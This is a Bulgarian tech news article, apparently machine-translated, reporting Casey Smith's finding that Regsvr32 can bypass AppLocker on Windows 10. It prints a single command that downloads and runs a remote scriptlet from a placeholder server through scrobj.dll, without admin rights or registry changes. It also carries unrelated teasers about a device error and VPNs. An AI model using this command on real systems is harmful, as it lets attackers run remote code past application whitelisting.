Regsvr32 може да се използва за заобикаляне на applocker на Windows 10
Видео: SteelCon 2019: Built-In Appl. Whitelisting With Windows Defender Application Control - Chris Truncer 2024
Изследовател от Колорадо, който носи името, Кейси Смит, откри, че Regsvr32 може да се използва за заобикаляне на AppLocker в Windows 10 и това е голям проблем за компютърните потребители, особено тези в бизнес средата.
AppLocker е представен за първи път в Windows 7 и Windows Server 2008 R2. Той е предназначен да позволи на администраторите да определят коя група или потребители могат да се възползват от някои или всички приложения въз основа на уникалната идентичност на файловете. Ако сте човек, който е склонен да използва AppLocker, тогава трябва да е общоизвестно, че може да се използва за създаване на определени правила, позволяващи на приложенията да ги стартират или спират в техните песни.
За тези, които може да не знаят, Regvr32 може да се използва за регистриране и отписване на DLL файлове. Това не е инструмент с едно щракване, тъй като е полезна програма за команден ред, така че само напреднали компютърни потребители трябва да се стремят да се възползват от това, което може да предложи.
Ние разбираме, че използвайки тази техника, тя не променя регистъра на компютърната система, което затруднява администраторите да знаят дали са направени някакви промени.
regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll
„Удивителното тук е, че regsvr32 вече е запознат с прокси, използва TLS, следва пренасочвания и т.н.… И… Познахте подписан, по подразбиране MS двоичен файл. Така че всичко, което трябва да направите, е да хоствате своя файл.sct на място, което контролирате “, написа Смит.
Горната техника не изисква административни привилегии и не променя регистъра. Освен това, скриптите могат да бъдат извиквани както през HTTP, така и през HTTPS. В момента Microsoft не е пуснала кръпка за този малък проблем, така че единствената възможност в този момент е да блокира Regsvr32 чрез защитната стена на Windows.
Интересно е, че софтуерният гигант все още не е отговорил по този проблем със сигурността, изправен пред операционната си система. Сега, когато тя е на открито, очакваме да чуем нещо от компанията заедно с разговори за бъдещ кръпка.
Това устройство не може да намери достатъчно безплатни ресурси, които може да използва (код 12)
Грешката „Това устройство не може да намери достатъчно безплатно, за да може да използва (код12)“ грешката е тази, която прозорците на свойствата на устройствата се показват в полето за състояние на устройството. Ето няколко решения, които могат да отстранят проблема с код 12 в Windows.
Топ 5 vpn за roblox за заобикаляне на ограниченията във вашата страна
Търсите най-добрия VPN за деблокиране на Roblox във вашата страна? Присъединете се към нас, докато преглеждаме топ 5 VPN за Roblox, за да заобиколи ограничението във всяка страна
3 най-добри vpns за германия за заобикаляне на гео ограниченията през 2019 г.
Кой е най-добрият VPN за използване в Германия? Предлагаме да използвате Cyberghost VPN, NordVPN или IPVanish. Тези инструменти винаги ще защитават вашата поверителност онлайн.
